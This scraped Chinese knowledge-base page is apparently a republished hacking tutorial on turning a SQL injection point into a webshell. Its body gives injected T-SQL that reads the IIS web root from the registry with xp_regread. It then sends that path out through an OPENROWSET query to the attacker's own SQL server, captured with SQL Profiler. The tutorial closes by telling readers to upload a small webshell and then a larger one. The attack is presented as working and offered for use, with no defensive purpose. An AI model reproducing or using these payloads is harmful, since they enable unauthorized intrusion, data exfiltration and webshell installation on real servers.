主頁(yè) > 知識(shí)庫(kù) > 滲透中用openrowset搞shell的方法

滲透中用openrowset搞shell的方法

熱門(mén)標(biāo)簽:臨滄移動(dòng)外呼系統(tǒng)哪家有 寧夏保險(xiǎn)智能外呼系統(tǒng)哪家好 溫嶺代理外呼系統(tǒng) 防城港市ai電銷(xiāo)機(jī)器人 怎么更改地圖標(biāo)注電話(huà) 交行外呼系統(tǒng)有哪些 激戰(zhàn)黃昏地圖標(biāo)注說(shuō)明 不同的地圖標(biāo)注 隨州銷(xiāo)售外呼系統(tǒng)平臺(tái)
滲透中用openrowset搞shell的方法 
得到SQL注入點(diǎn),首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發(fā)現(xiàn)屏蔽了SQL錯(cuò)誤信息,得不到物理路徑,那還寫(xiě)個(gè)PP馬了.
聯(lián)想到一個(gè)權(quán)限不是很高的命令openrowset,進(jìn)行跨庫(kù)服務(wù)器查詢(xún),就是把一個(gè)SQL命令發(fā)送到遠(yuǎn)程數(shù)據(jù)庫(kù),然后看返回的結(jié)果,但是要啟動(dòng)事件跟蹤!我們可以把網(wǎng)站信息寫(xiě)入數(shù)據(jù)庫(kù),然后%$^%$@#$@^%$~
首先在自己機(jī)器建立SQL數(shù)據(jù)庫(kù) 

然后在對(duì)方機(jī)器上建立個(gè)表 create table [dbo].[fenggou]([cha8][char](255))--

在對(duì)方執(zhí)行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

這樣fenggou這個(gè)表里就會(huì)有這樣一條記錄select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用說(shuō),''D:\WEB"就是從注冊(cè)表里讀出的物理路徑拉.然后執(zhí)行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--

等于執(zhí)行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,這時(shí)你在你機(jī)器上SQL事件追蹤器上就會(huì)顯示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 
哇 哈哈哈哈哈 物理路徑到手了 寫(xiě)小馬傳大馬吧~ 

標(biāo)簽:紅河 阜陽(yáng) 哈密 忻州 無(wú)錫 青海 河源 沈陽(yáng)

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《滲透中用openrowset搞shell的方法》,本文關(guān)鍵詞  滲透,中用,openrowset,搞,shell,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《滲透中用openrowset搞shell的方法》相關(guān)的同類(lèi)信息!
  • 本頁(yè)收集關(guān)于滲透中用openrowset搞shell的方法的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章